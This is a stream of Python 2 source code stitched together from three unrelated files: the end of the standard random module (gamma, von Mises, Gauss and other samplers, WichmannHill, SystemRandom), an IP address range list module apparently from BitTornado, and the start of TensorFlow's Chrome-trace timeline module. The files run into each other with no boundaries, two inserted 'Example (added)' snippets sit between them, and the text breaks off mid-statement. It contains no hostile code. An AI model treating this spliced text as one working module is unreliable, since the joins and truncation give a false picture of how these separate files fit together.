""" # lambd: rate lambd = 1/mean # ('lambda' is a Python reserved word) random = self.random u = random() while u <= 1e-7: u = random() return -_log(u)/lambd ## -------------------- von Mises distribution -------------------- def vonmisesvariate(self, mu, kappa): """Circular data distribution. mu is the mean angle, expressed in radians between 0 and 2*pi, and kappa is the concentration parameter, which must be greater than or equal to zero. If kappa is equal to zero, this distribution reduces to a uniform random angle over the range 0 to 2*pi. """ # mu: mean angle (in radians between 0 and 2*pi) # kappa: concentration parameter kappa (>= 0) # if kappa = 0 generate uniform random angle # Based upon an algorithm published in: Fisher, N.I., # "Statistical Analysis of Circular Data", Cambridge # University Press, 1993. # Thanks to Magnus Kessler for a correction to the # implementation of step 4. random = self.random if kappa <= 1e-6: return TWOPI * random() a = 1.0 + _sqrt(1.0 + 4.0 * kappa * kappa) b = (a - _sqrt(2.0 * a))/(2.0 * kappa) r = (1.0 + b * b)/(2.0 * b) while 1: u1 = random() z = _cos(_pi * u1) f = (1.0 + r * z)/(r + z) c = kappa * (r - f) u2 = random() if u2 < c * (2.0 - c) or u2 <= c * _exp(1.0 - c): break u3 = random() if u3 > 0.5: theta = (mu % TWOPI) + _acos(f) else: theta = (mu % TWOPI) - _acos(f) return theta ## -------------------- gamma distribution -------------------- def gammavariate(self, alpha, beta): """Gamma distribution. Not the gamma function! Conditions on the parameters are alpha > 0 and beta > 0. """ # alpha > 0, beta > 0, mean is alpha*beta, variance is alpha*beta**2 # Warning: a few older sources define the gamma distribution in terms # of alpha > -1.0 if alpha <= 0.0 or beta <= 0.0: raise ValueError, 'gammavariate: alpha and beta must be > 0.0' random = self.random if alpha > 1.0: # Uses R.C.H. Cheng, "The generation of Gamma # variables with non-integral shape parameters", # Applied Statistics, (1977), 26, No. 1, p71-74 ainv = _sqrt(2.0 * alpha - 1.0) bbb = alpha - LOG4 ccc = alpha + ainv while 1: u1 = random() if not 1e-7 < u1 < .9999999: continue u2 = 1.0 - random() v = _log(u1/(1.0-u1))/ainv x = alpha*_exp(v) z = u1*u1*u2 r = bbb+ccc*v-x if r + SG_MAGICCONST - 4.5*z >= 0.0 or r >= _log(z): return x * beta elif alpha == 1.0: # expovariate(1) u = random() while u <= 1e-7: u = random() return -_log(u) * beta else: # alpha is between 0 and 1 (exclusive) # Uses ALGORITHM GS of Statistical Computing - Kennedy & Gentle while 1: u = random() b = (_e + alpha)/_e p = b*u if p <= 1.0: x = p ** (1.0/alpha) else: x = -_log((b-p)/alpha) u1 = random() if p > 1.0: if u1 <= x ** (alpha - 1.0): break elif u1 <= _exp(-x): break return x * beta ## -------------------- Gauss (faster alternative) -------------------- def gauss(self, mu, sigma): """Gaussian distribution. mu is the mean, and sigma is the standard deviation. This is slightly faster than the normalvariate() function. Not thread-safe without a lock around calls. """ # When x and y are two variables from [0, 1), uniformly # distributed, then # # cos(2*pi*x)*sqrt(-2*log(1-y)) # sin(2*pi*x)*sqrt(-2*log(1-y)) # # are two *independent* variables with normal distribution # (mu = 0, sigma = 1). # (Lambert Meertens) # (corrected version; bug discovered by Mike Miller, fixed by LM) # Multithreading note: When two threads call this function # simultaneously, it is possible that they will receive the # same return value. The window is very small though. To # avoid this, you have to use a lock around all calls. 
(I # didn't want to slow this down in the serial case by using a # lock here.) random = self.random z = self.gauss_next self.gauss_next = None if z is None: x2pi = random() * TWOPI g2rad = _sqrt(-2.0 * _log(1.0 - random())) z = _cos(x2pi) * g2rad self.gauss_next = _sin(x2pi) * g2rad return mu + z*sigma ## -------------------- beta -------------------- ## See ## http://sourceforge.net/bugs/?func=detailbug&bug_id=130030&group_id=5470 ## for Ivan Frohne's insightful analysis of why the original implementation: ## ## def betavariate(self, alpha, beta): ## # Discrete Event Simulation in C, pp 87-88. ## ## y = self.expovariate(alpha) ## z = self.expovariate(1.0/beta) ## return z/(y+z) ## ## was dead wrong, and how it probably got that way. def betavariate(self, alpha, beta): """Beta distribution. Conditions on the parameters are alpha > 0 and beta > 0. Returned values range between 0 and 1. """ # This version due to Janne Sinkkonen, and matches all the std # texts (e.g., Knuth Vol 2 Ed 3 pg 134 "the beta distribution"). y = self.gammavariate(alpha, 1.) if y == 0: return 0.0 else: return y / (y + self.gammavariate(beta, 1.)) ## -------------------- Pareto -------------------- def paretovariate(self, alpha): """Pareto distribution. alpha is the shape parameter.""" # Jain, pg. 495 u = 1.0 - self.random() return 1.0 / pow(u, 1.0/alpha) ## -------------------- Weibull -------------------- def weibullvariate(self, alpha, beta): """Weibull distribution. alpha is the scale parameter and beta is the shape parameter. """ # Jain, pg. 499; bug fix courtesy Bill Arms u = 1.0 - self.random() return alpha * pow(-_log(u), 1.0/beta) ## -------------------- Wichmann-Hill ------------------- class WichmannHill(Random): VERSION = 1 # used by getstate/setstate def seed(self, a=None): """Initialize internal state from hashable object. None or no argument seeds from current time or from an operating system specific randomness source if available. If a is not None or an int or long, hash(a) is used instead. If a is an int or long, a is used directly. Distinct values between 0 and 27814431486575L inclusive are guaranteed to yield distinct internal states (this guarantee is specific to the default Wichmann-Hill generator). """ if a is None: try: a = long(_hexlify(_urandom(16)), 16) except NotImplementedError: import time a = long(time.time() * 256) # use fractional seconds if not isinstance(a, (int, long)): a = hash(a) a, x = divmod(a, 30268) a, y = divmod(a, 30306) a, z = divmod(a, 30322) self._seed = int(x)+1, int(y)+1, int(z)+1 self.gauss_next = None def random(self): """Get the next random number in the range [0.0, 1.0).""" # Wichman-Hill random number generator. # # Wichmann, B. A. & Hill, I. D. (1982) # Algorithm AS 183: # An efficient and portable pseudo-random number generator # Applied Statistics 31 (1982) 188-190 # # see also: # Correction to Algorithm AS 183 # Applied Statistics 33 (1984) 123 # # McLeod, A. I. (1985) # A remark on Algorithm AS 183 # Applied Statistics 34 (1985),198-200 # This part is thread-unsafe: # BEGIN CRITICAL SECTION x, y, z = self._seed x = (171 * x) % 30269 y = (172 * y) % 30307 z = (170 * z) % 30323 self._seed = x, y, z # END CRITICAL SECTION # Note: on a platform using IEEE-754 double arithmetic, this can # never return 0.0 (asserted by Tim; proof too long for a comment). 
return (x/30269.0 + y/30307.0 + z/30323.0) % 1.0 def getstate(self): """Return internal state; can be passed to setstate() later.""" return self.VERSION, self._seed, self.gauss_next def setstate(self, state): """Restore internal state from object returned by getstate().""" version = state[0] if version == 1: version, self._seed, self.gauss_next = state else: raise ValueError("state with version %s passed to " "Random.setstate() of version %s" % (version, self.VERSION)) def jumpahead(self, n): """Act as if n calls to random() were made, but quickly. n is an int, greater than or equal to 0. Example use: If you have 2 threads and know that each will consume no more than a million random numbers, create two Random objects r1 and r2, then do r2.setstate(r1.getstate()) r2.jumpahead(1000000) Then r1 and r2 will use guaranteed-disjoint segments of the full period. """ if not n >= 0: raise ValueError("n must be >= 0") x, y, z = self._seed x = int(x * pow(171, n, 30269)) % 30269 y = int(y * pow(172, n, 30307)) % 30307 z = int(z * pow(170, n, 30323)) % 30323 self._seed = x, y, z def __whseed(self, x=0, y=0, z=0): """Set the Wichmann-Hill seed from (x, y, z). These must be integers in the range [0, 256). """ if not type(x) == type(y) == type(z) == int: raise TypeError('seeds must be integers') if not (0 <= x < 256 and 0 <= y < 256 and 0 <= z < 256): raise ValueError('seeds must be in range(0, 256)') if 0 == x == y == z: # Initialize from current time import time t = long(time.time() * 256) t = int((t&0xffffff) ^ (t>>24)) t, x = divmod(t, 256) t, y = divmod(t, 256) t, z = divmod(t, 256) # Zero is a poor seed, so substitute 1 self._seed = (x or 1, y or 1, z or 1) self.gauss_next = None def whseed(self, a=None): """Seed from hashable object's hash code. None or no argument seeds from current time. It is not guaranteed that objects with distinct hash codes lead to distinct internal states. This is obsolete, provided for compatibility with the seed routine used prior to Python 2.1. Use the .seed() method instead. """ if a is None: self.__whseed() return a = hash(a) a, x = divmod(a, 256) a, y = divmod(a, 256) a, z = divmod(a, 256) x = (x + a) % 256 or 1 y = (y + a) % 256 or 1 z = (z + a) % 256 or 1 self.__whseed(x, y, z) ## --------------- Operating System Random Source ------------------ class SystemRandom(Random): """Alternate random number generator using sources provided by the operating system (such as /dev/urandom on Unix or CryptGenRandom on Windows). Not available on all systems (see os.urandom() for details). """ def random(self): """Get the next random number in the range [0.0, 1.0).""" return (long(_hexlify(_urandom(7)), 16) >> 3) * RECIP_BPF def getrandbits(self, k): """getrandbits(k) -> x. Generates a long int with k random bits.""" if k <= 0: raise ValueError('number of bits must be greater than zero') if k != int(k): raise TypeError('number of bits should be an integer') bytes = (k + 7) // 8 # bits / 8 and rounded up x = long(_hexlify(_urandom(bytes)), 16) return x >> (bytes * 8 - k) # trim excess bits def _stub(self, *args, **kwds): "Stub method. Not used for a system random number generator." return None seed = jumpahead = _stub def _notimplemented(self, *args, **kwds): "Method should not be called for a system random number generator." 
raise NotImplementedError('System entropy source does not have state.') getstate = setstate = _notimplemented ## -------------------- test program -------------------- def _test_generator(n, func, args): import time print n, 'times', func.__name__ total = 0.0 sqsum = 0.0 smallest = 1e10 largest = -1e10 t0 = time.time() for i in range(n): x = func(*args) total += x sqsum = sqsum + x*x smallest = min(x, smallest) largest = max(x, largest) t1 = time.time() print round(t1-t0, 3), 'sec,', avg = total/n stddev = _sqrt(sqsum/n - avg*avg) print 'avg %g, stddev %g, min %g, max %g' % \ (avg, stddev, smallest, largest) def _test(N=2000): _test_generator(N, random, ()) _test_generator(N, normalvariate, (0.0, 1.0)) _test_generator(N, lognormvariate, (0.0, 1.0)) _test_generator(N, vonmisesvariate, (0.0, 1.0)) _test_generator(N, gammavariate, (0.01, 1.0)) _test_generator(N, gammavariate, (0.1, 1.0)) _test_generator(N, gammavariate, (0.1, 2.0)) _test_generator(N, gammavariate, (0.5, 1.0)) _test_generator(N, gammavariate, (0.9, 1.0)) _test_generator(N, gammavariate, (1.0, 1.0)) _test_generator(N, gammavariate, (2.0, 1.0)) _test_generator(N, gammavariate, (20.0, 1.0)) _test_generator(N, gammavariate, (200.0, 1.0)) _test_generator(N, gauss, (0.0, 1.0)) _test_generator(N, betavariate, (3.0, 3.0)) _test_generator(N, triangular, (0.0, 1.0, 1.0/3.0)) # Create one instance, seeded from current time, and export its methods # as module-level functions. The functions share state across all uses #(both in the user's code and in the Python libraries), but that's fine # for most programs and is easier for the casual user than making them # instantiate their own Random() instance. _inst = Random() seed = _inst.seed random = _inst.random uniform = _inst.uniform triangular = _inst.triangular randint = _inst.randint choice = _inst.choice randrange = _inst.randrange sample = _inst.sample shuffle = _inst.shuffle normalvariate = _inst.normalvariate lognormvariate = _inst.lognormvariate expovariate = _inst.expovariate vonmisesvariate = _inst.vonmisesvariate gammavariate = _inst.gammavariate gauss = _inst.gauss betavariate = _inst.betavariate paretovariate = _inst.paretovariate weibullvariate = _inst.weibullvariate getstate = _inst.getstate setstate = _inst.setstate jumpahead = _inst.jumpahead getrandbits = _inst.getrandbits if __name__ == '__main__': _test()
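# Example (added): a minimal sketch of how the module-level functions above
# relate to explicit Random instances. The module-level names all delegate to
# the single hidden `_inst`, so reproducible or independent streams need their
# own Random() objects. Wrapped in a function so nothing runs at import time.
def _example_independent_streams():
    r1 = Random()
    r2 = Random()
    r1.seed(42)
    r2.seed(42)
    assert r1.random() == r2.random()   # same seed -> identical streams

    state = r1.getstate()               # snapshot the generator state...
    first = r1.random()
    r1.setstate(state)                  # ...and rewind to replay the draw
    assert r1.random() == first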
# Written by John Hoffman # see LICENSE.txt for license information from bisect import bisect, insort try: True except: True = 1 False = 0 bool = lambda x: not not x hexbinmap = { '0': '0000', '1': '0001', '2': '0010', '3': '0011', '4': '0100', '5': '0101', '6': '0110', '7': '0111', '8': '1000', '9': '1001', 'a': '1010', 'b': '1011', 'c': '1100', 'd': '1101', 'e': '1110', 'f': '1111', 'x': '0000', } chrbinmap = {} for n in xrange(256): b = [] nn = n for i in xrange(8): if nn & 0x80: b.append('1') else: b.append('0') nn <<= 1 chrbinmap[n] = ''.join(b) def to_bitfield_ipv4(ip): ip = ip.split('.') if len(ip) != 4: raise ValueError, "bad address" b = [] for i in ip: b.append(chrbinmap[int(i)]) return ''.join(b) def to_bitfield_ipv6(ip): b = '' doublecolon = False if ip == '': raise ValueError, "bad address" if ip == '::': # boundary handling ip = '' elif ip[:2] == '::': ip = ip[1:] elif ip[0] == ':': raise ValueError, "bad address" elif ip[-2:] == '::': ip = ip[:-1] elif ip[-1] == ':': raise ValueError, "bad address" for n in ip.split(':'): if n == '': # double-colon if doublecolon: raise ValueError, "bad address" doublecolon = True b += ':' continue if n.find('.') >= 0: # IPv4 n = to_bitfield_ipv4(n) b += n + '0'*(32-len(n)) continue n = ('x'*(4-len(n))) + n for i in n: b += hexbinmap[i] if doublecolon: pos = b.find(':') b = b[:pos]+('0'*(129-len(b)))+b[pos+1:] if len(b) != 128: # always check size raise ValueError, "bad address" return b ipv4addrmask = to_bitfield_ipv6('::ffff:0:0')[:96] class IP_List: def __init__(self, entrylist=None): self.ipv4list = [] self.ipv6list = [] if entrylist: for ip, depth in entrylist: self._append(ip,depth) self.ipv4list.sort() self.ipv6list.sort() def __nonzero__(self): return bool(self.ipv4list or self.ipv6list) def _append(self, ip, depth = 256): if ip.find(':') < 0: # IPv4 self.ipv4list.append(to_bitfield_ipv4(ip)[:depth]) else: b = to_bitfield_ipv6(ip) if b.startswith(ipv4addrmask): self.ipv4list.append(b[96:][:depth-96]) else: self.ipv6list.append(b[:depth]) def append(self, ip, depth = 256): if ip.find(':') < 0: # IPv4 insort(self.ipv4list,to_bitfield_ipv4(ip)[:depth]) else: b = to_bitfield_ipv6(ip) if b.startswith(ipv4addrmask): insort(self.ipv4list,b[96:][:depth-96]) else: insort(self.ipv6list,b[:depth]) def includes(self, ip): if not (self.ipv4list or self.ipv6list): return False if ip.find(':') < 0: # IPv4 b = to_bitfield_ipv4(ip) else: b = to_bitfield_ipv6(ip) if b.startswith(ipv4addrmask): b = b[96:] if len(b) > 32: l = self.ipv6list else: l = self.ipv4list for map in l[bisect(l,b)-1:]: if b.startswith(map): return True if map > b: return False return False def read_fieldlist(self, file): # reads a list from a file in the format 'ip/len <whatever>' f = open(file, 'r') while True: line = f.readline() if not line: break line = line.strip().expandtabs() if not line or line[0] == '#': continue try: line, garbage = line.split(' ',1) except: pass try: line, garbage = line.split('#',1) except: pass try: ip, depth = line.split('/') except: ip = line depth = None try: if depth is not None: depth = int(depth) self._append(ip,depth) except: print '*** WARNING *** could not parse IP range: '+line f.close() self.ipv4list.sort() self.ipv6list.sort() def set_intranet_addresses(self): self.append('127.0.0.1',8) self.append('10.0.0.0',8) self.append('172.16.0.0',12) self.append('192.168.0.0',16) self.append('169.254.0.0',16) self.append('::1') self.append('fe80::',16) self.append('fec0::',16) def set_ipv4_addresses(self): self.append('::ffff:0:0',96) def 
ipv6_to_ipv4(ip):
    ip = to_bitfield_ipv6(ip)
    if not ip.startswith(ipv4addrmask):
        raise ValueError, "not convertible to IPv4"
    ip = ip[-32:]
    x = ''
    for i in range(4):
        x += str(int(ip[:8],2))
        if i < 3:
            x += '.'
        ip = ip[8:]
    return x

def to_ipv4(ip):
    if is_ipv4(ip):
        _valid_ipv4(ip)
        return ip
    return ipv6_to_ipv4(ip)

def is_ipv4(ip):
    return ip.find(':') < 0

def _valid_ipv4(ip):
    ip = ip.split('.')
    if len(ip) != 4:
        raise ValueError
    for i in ip:
        chr(int(i))

def is_valid_ip(ip):
    try:
        if not ip:
            return False
        if is_ipv4(ip):
            _valid_ipv4(ip)
            return True
        to_bitfield_ipv6(ip)
        return True
    except:
        return False
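# Example (added): a hedged sketch of the intended use of IP_List and the
# helpers above. The addresses are placeholders; set_intranet_addresses()
# preloads the private/loopback ranges defined earlier in this module.
def _example_ip_list_usage():
    ipl = IP_List()
    ipl.set_intranet_addresses()
    assert ipl.includes('192.168.1.10')       # falls inside 192.168.0.0/16
    assert not ipl.includes('8.8.8.8')        # public address, not listed
    assert to_ipv4('::ffff:10.0.0.1') == '10.0.0.1'   # IPv4-mapped IPv6
    assert is_valid_ip('fe80::1') and not is_valid_ip('300.1.2.3')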
# Copyright 2016 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Timeline visualization for TensorFlow using Chrome Trace Format.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import copy import json import six # pylint: disable=unused-import # The timeline target is usually imported as part of BUILD target # "platform_test", which includes also includes the "platform" # dependency. This is why the logging import here is okay. from tensorflow.python.platform import tf_logging as logging class AllocationMaximum(collections.namedtuple( 'AllocationMaximum', ('timestamp', 'num_bytes', 'tensors'))): """Stores the maximum allocation for a given allocator within the timelne. Parameters: timestamp: `tensorflow::Env::NowMicros()` when this maximum was reached. num_bytes: the total memory used at this time. tensors: the set of tensors allocated at this time. """ pass class StepStatsAnalysis(collections.namedtuple( 'StepStatsAnalysis', ('chrome_trace', 'allocator_maximums'))): """Stores the step stats analysis output. Parameters: chrome_trace: A dict containing the chrome trace analysis. allocator_maximums: A dict mapping allocator names to AllocationMaximum. """ pass class _ChromeTraceFormatter(object): """A helper class for generating traces in Chrome Trace Format.""" def __init__(self, show_memory=False): """Constructs a new Chrome Trace formatter.""" self._show_memory = show_memory self._events = [] self._metadata = [] def _create_event(self, ph, category, name, pid, tid, timestamp): """Creates a new Chrome Trace event. For details of the file format, see: https://github.com/catapult-project/catapult/blob/master/tracing/README.md Args: ph: The type of event - usually a single character. category: The event category as a string. name: The event name as a string. pid: Identifier of the process generating this event as an integer. tid: Identifier of the thread generating this event as an integer. timestamp: The timestamp of this event as a long integer. Returns: A JSON compatible event object. """ event = {} event['ph'] = ph event['cat'] = category event['name'] = name event['pid'] = pid event['tid'] = tid event['ts'] = timestamp return event def emit_pid(self, name, pid): """Adds a process metadata event to the trace. Args: name: The process name as a string. pid: Identifier of the process as an integer. """ event = {} event['name'] = 'process_name' event['ph'] = 'M' event['pid'] = pid event['args'] = {'name': name} self._metadata.append(event) def emit_tid(self, name, pid, tid): """Adds a thread metadata event to the trace. Args: name: The thread name as a string. pid: Identifier of the process as an integer. tid: Identifier of the thread as an integer. 
""" event = {} event['name'] = 'thread_name' event['ph'] = 'M' event['pid'] = pid event['tid'] = tid event['args'] = {'name': name} self._metadata.append(event) def emit_region(self, timestamp, duration, pid, tid, category, name, args): """Adds a region event to the trace. Args: timestamp: The start timestamp of this region as a long integer. duration: The duration of this region as a long integer. pid: Identifier of the process generating this event as an integer. tid: Identifier of the thread generating this event as an integer. category: The event category as a string. name: The event name as a string. args: A JSON-compatible dictionary of event arguments. """ event = self._create_event('X', category, name, pid, tid, timestamp) event['dur'] = duration event['args'] = args self._events.append(event) def emit_obj_create(self, category, name, timestamp, pid, tid, object_id): """Adds an object creation event to the trace. Args: category: The event category as a string. name: The event name as a string. timestamp: The timestamp of this event as a long integer. pid: Identifier of the process generating this event as an integer. tid: Identifier of the thread generating this event as an integer. object_id: Identifier of the object as an integer. """ event = self._create_event('N', category, name, pid, tid, timestamp) event['id'] = object_id self._events.append(event) def emit_obj_delete(self, category, name, timestamp, pid, tid, object_id): """Adds an object deletion event to the trace. Args: category: The event category as a string. name: The event name as a string. timestamp: The timestamp of this event as a long integer. pid: Identifier of the process generating this event as an integer. tid: Identifier of the thread generating this event as an integer. object_id: Identifier of the object as an integer. """ event = self._create_event('D', category, name, pid, tid, timestamp) event['id'] = object_id self._events.append(event) def emit_obj_snapshot(self, category, name, timestamp, pid, tid, object_id, snapshot): """Adds an object snapshot event to the trace. Args: category: The event category as a string. name: The event name as a string. timestamp: The timestamp of this event as a long integer. pid: Identifier of the process generating this event as an integer. tid: Identifier of the thread generating this event as an integer. object_id: Identifier of the object as an integer. snapshot: A JSON-compatible representation of the object. """ event = self._create_event('O', category, name, pid, tid, timestamp) event['id'] = object_id event['args'] = {'snapshot': snapshot} self._events.append(event) def emit_flow_start(self, name, timestamp, pid, tid, flow_id): """Adds a flow start event to the trace. When matched with a flow end event (with the same 'flow_id') this will cause the trace viewer to draw an arrow between the start and end events. Args: name: The event name as a string. timestamp: The timestamp of this event as a long integer. pid: Identifier of the process generating this event as an integer. tid: Identifier of the thread generating this event as an integer. flow_id: Identifier of the flow as an integer. """ event = self._create_event('s', 'DataFlow', name, pid, tid, timestamp) event['id'] = flow_id self._events.append(event) def emit_flow_end(self, name, timestamp, pid, tid, flow_id): """Adds a flow end event to the trace. When matched with a flow start event (with the same 'flow_id') this will cause the trace viewer to draw an arrow between the start and end events. 
Args: name: The event name as a string. timestamp: The timestamp of this event as a long integer. pid: Identifier of the process generating this event as an integer. tid: Identifier of the thread generating this event as an integer. flow_id: Identifier of the flow as an integer. """ event = self._create_event('t', 'DataFlow', name, pid, tid, timestamp) event['id'] = flow_id self._events.append(event) def emit_counter(self, category, name, pid, timestamp, counter, value): """Emits a record for a single counter. Args: category: The event category as a string. name: The event name as a string. pid: Identifier of the process generating this event as an integer. timestamp: The timestamp of this event as a long integer. counter: Name of the counter as a string. value: Value of the counter as an integer. """ event = self._create_event('C', category, name, pid, 0, timestamp) event['args'] = {counter: value} self._events.append(event) def emit_counters(self, category, name, pid, timestamp, counters): """Emits a counter record for the dictionary 'counters'. Args: category: The event category as a string. name: The event name as a string. pid: Identifier of the process generating this event as an integer. timestamp: The timestamp of this event as a long integer. counters: Dictionary of counter values. """ event = self._create_event('C', category, name, pid, 0, timestamp) event['args'] = counters.copy() self._events.append(event) def format_to_string(self, pretty=False): """Formats the chrome trace to a string. Args: pretty: (Optional.) If True, produce human-readable JSON output. Returns: A JSON-formatted string in Chrome Trace format. """ trace = {} trace['traceEvents'] = self._metadata + self._events if pretty: return json.dumps(trace, indent=4, separators=(',', ': ')) else: return json.dumps(trace, separators=(',', ':')) class _TensorTracker(object): """An internal class to track the lifetime of a Tensor.""" def __init__(self, name, object_id, timestamp, pid, allocator, num_bytes): """Creates an object to track tensor references. This class is not thread safe and is intended only for internal use by the 'Timeline' class in this file. Args: name: The name of the Tensor as a string. object_id: Chrome Trace object identifier assigned for this Tensor. timestamp: The creation timestamp of this event as a long integer. pid: Process identifier of the assicaiated device, as an integer. allocator: Name of the allocator used to create the Tensor. num_bytes: Number of bytes allocated (long integer). Returns: A 'TensorTracker' object. 
""" self._name = name self._pid = pid self._object_id = object_id self._create_time = timestamp self._allocator = allocator self._num_bytes = num_bytes self._ref_times = [] self._unref_times = [] @property def name(self): """Name of this tensor.""" return self._name @property def pid(self): """ID of the process which created this tensor (an integer).""" return self._pid @property def create_time(self): """Timestamp when this tensor was created (long integer).""" return self._create_time @property def object_id(self): """Returns the object identifier of this tensor (integer).""" return self._object_id @property def num_bytes(self): """Size of this tensor in bytes (long integer).""" return self._num_bytes @property def allocator(self): """Name of the allocator used to create this tensor (string).""" return self._allocator @property def last_unref(self): """Last unreference timestamp of this tensor (long integer).""" return max(self._unref_times) def add_ref(self, timestamp): """Adds a reference to this tensor with the specified timestamp. Args: timestamp: Timestamp of object reference as an integer. """ self._ref_times.append(timestamp) def add_unref(self, timestamp): """Adds an unref to this tensor with the specified timestamp. Args: timestamp: Timestamp of object unreference as an integer. """ self._unref_times.append(timestamp) class Timeline(object): """A class for visualizing execution timelines of TensorFlow steps.""" def __init__(self, step_stats, graph=None): """Constructs a new Timeline. A 'Timeline' is used for visualizing the execution of a TensorFlow computation. It shows the timings and concurrency of execution at the granularity of TensorFlow Ops. This class is not thread safe. Args: step_stats: The 'StepStats' proto recording execution times. graph: (Optional) The 'Graph' that was executed. """ self._step_stats = step_stats self._graph = graph self._chrome_trace = _ChromeTraceFormatter() self._next_pid = 0 self._device_pids = {} # device name -> pid for compute activity. self._tensor_pids = {} # device name -> pid for tensors. self._tensors = {} # tensor_name -> TensorTracker self._next_flow_id = 0 self._flow_starts = {} # tensor_name -> (timestamp, pid, tid) self._alloc_times = {} # tensor_name -> ( time, allocator, size ) self._allocator_maximums = {} # allocator name => maximum bytes long def _alloc_pid(self): """Allocate a process Id.""" pid = self._next_pid self._next_pid += 1 return pid def _alloc_flow_id(self): """Allocate a flow Id.""" flow_id = self._next_flow_id self._next_flow_id += 1 return flow_id def _parse_op_label(self, label): """Parses the fields in a node timeline label.""" nn, rest = label.split(' = ') op, rest = rest.split('(') if rest == ')': inputs = [] else: inputs = rest[:-1].split(', ') return nn, op, inputs def _assign_lanes(self): """Assigns non-overlapping lanes for the activities on each device.""" for device_stats in self._step_stats.dev_stats: # TODO(pbar): Genuine thread IDs in NodeExecStats might be helpful. lanes = [0] for ns in device_stats.node_stats: l = -1 for (i, lts) in enumerate(lanes): if ns.all_start_micros > lts: l = i lanes[l] = ns.all_start_micros + ns.all_end_rel_micros break if l < 0: l = len(lanes) lanes.append(ns.all_start_micros + ns.all_end_rel_micros) ns.thread_id = l def _emit_op(self, nodestats, pid): """Generates a Chrome Trace event to show Op execution. Args: nodestats: The 'NodeExecStats' proto recording op execution. pid: The pid assigned for the device where this op ran. 
""" node_name = nodestats.node_name start = nodestats.all_start_micros duration = nodestats.all_end_rel_micros tid = nodestats.thread_id _, op, inputs = self._parse_op_label(nodestats.timeline_label) args = {'name': node_name, 'op': op} for i, iname in enumerate(inputs): args['input%d' % i] = iname self._chrome_trace.emit_region(start, duration, pid, tid, 'Op', op, args) def _emit_tensor_snapshot(self, tensor, timestamp, pid, tid, value): """Generate Chrome Trace snapshot event for a computed Tensor. Args: tensor: A 'TensorTracker' object. timestamp: The timestamp of this snapshot as a long integer. pid: The pid assigned for showing the device where this op ran. tid: The tid of the thread computing the tensor snapshot. value: A JSON-compliant snapshot of the object. """ desc = str(value.tensor_description).replace('"', '') snapshot = {'tensor_description': desc} self._chrome_trace.emit_obj_snapshot('Tensor', tensor.name, timestamp, pid, tid, tensor.object_id, snapshot) def _produce_tensor(self, name, timestamp, tensors_pid, allocator, num_bytes): object_id = len(self._tensors) tensor = _TensorTracker(name, object_id, timestamp, tensors_pid, allocator, num_bytes) self._tensors[name] = tensor return tensor def _allocate_pids(self): """Allocate fake process ids for each device in the StepStats.""" self._allocators_pid = self._alloc_pid() self._chrome_trace.emit_pid('Allocators', self._allocators_pid) # Add processes in the Chrome trace to show compute and data activity. for dev_stats in self._step_stats.dev_stats: device_pid = self._alloc_pid() self._device_pids[dev_stats.device] = device_pid tensors_pid = self._alloc_pid() self._tensor_pids[dev_stats.device] = tensors_pid self._chrome_trace.emit_pid(dev_stats.device + ' Compute', device_pid) self._chrome_trace.emit_pid(dev_stats.device + ' Tensors', tensors_pid) def _analyze_tensors(self, show_memory): """Analyze tensor references to track dataflow.""" for dev_stats in self._step_stats.dev_stats: device_pid = self._device_pids[dev_stats.device] tensors_pid = self._tensor_pids[dev_stats.device] for node_stats in dev_stats.node_stats: tid = node_stats.thread_id node_name = node_stats.node_name start_time = node_stats.all_start_micros end_time = node_stats.all_start_micros + node_stats.all_end_rel_micros for index, output in enumerate(node_stats.output): if index: output_name = '%s:%d' % (node_name, index) else: output_name = node_name allocation = output.tensor_description.allocation_description num_bytes = allocation.requested_bytes allocator_name = allocation.allocator_name tensor = self._produce_tensor(output_name, start_time, tensors_pid, allocator_name, num_bytes) tensor.add_ref(start_time) tensor.add_unref(end_time) self._flow_starts[output_name] = (end_time, device_pid, tid) if show_memory: self._chrome_trace.emit_obj_create('Tensor', output_name, start_time, tensors_pid, tid, tensor.object_id) self._emit_tensor_snapshot(tensor, end_time - 1, tensors_pid, tid, output) def _show_compute(self, show_dataflow): """Visualize the computation activity.""" for dev_stats in self._step_stats.dev_stats: device_pid = self._device_pids[dev_stats.device] for node_stats in dev_stats.node_stats: tid = node_stats.thread_id start_time = node_stats.all_start_micros end_time = node_stats.all_start_micros + node_stats.all_end_rel_micros _, _, inputs = self._parse_op_label(node_stats.timeline_label) self._emit_op(node_stats, device_pid) for input_name in inputs: if input_name not in self._tensors: # This can happen when partitioning has inserted a Send/Recv. 
# We remove the numeric suffix so that the dataflow appears to # come from the original node. Ideally, the StepStats would # contain logging for the Send and Recv nodes. index = input_name.rfind('/_') if index > 0: input_name = input_name[:index] if input_name in self._tensors: tensor = self._tensors[input_name] tensor.add_ref(start_time) tensor.add_unref(end_time - 1) if show_dataflow: # We use a different flow ID for every graph edge. create_time, create_pid, create_tid = self._flow_starts[ input_name] # Don't add flows when producer and consumer ops are on the same # pid/tid since the horizontal arrows clutter the visualization. if create_pid != device_pid or create_tid != tid: flow_id = self._alloc_flow_id() self._chrome_trace.emit_flow_start(input_name, create_time, create_pid, create_tid, flow_id) self._chrome_trace.emit_flow_end(input_name, start_time, device_pid, tid, flow_id) else: logging.warning('Can\'t find tensor %s', input_name) def _show_memory_counters(self): """Produce a counter series for each memory allocator.""" # Iterate over all tensor trackers to build a list of allocations and # frees for each allocator. Then sort the lists and emit a cumulative # counter series for each allocator. allocations = {} for name in self._tensors: tensor = self._tensors[name] self._chrome_trace.emit_obj_delete('Tensor', name, tensor.last_unref, tensor.pid, 0, tensor.object_id) allocator = tensor.allocator if allocator not in allocations: allocations[allocator] = [] num_bytes = tensor.num_bytes allocations[allocator].append((tensor.create_time, num_bytes, name)) allocations[allocator].append((tensor.last_unref, -num_bytes, name)) alloc_maxes = {} # Generate a counter series showing total allocations for each allocator. for allocator in allocations: alloc_list = allocations[allocator] alloc_list.sort() total_bytes = 0 alloc_tensor_set = set() alloc_maxes[allocator] = AllocationMaximum( timestamp=0, num_bytes=0, tensors=set()) for time, num_bytes, name in alloc_list: total_bytes += num_bytes if num_bytes < 0: alloc_tensor_set.discard(name) else: alloc_tensor_set.add(name) if total_bytes > 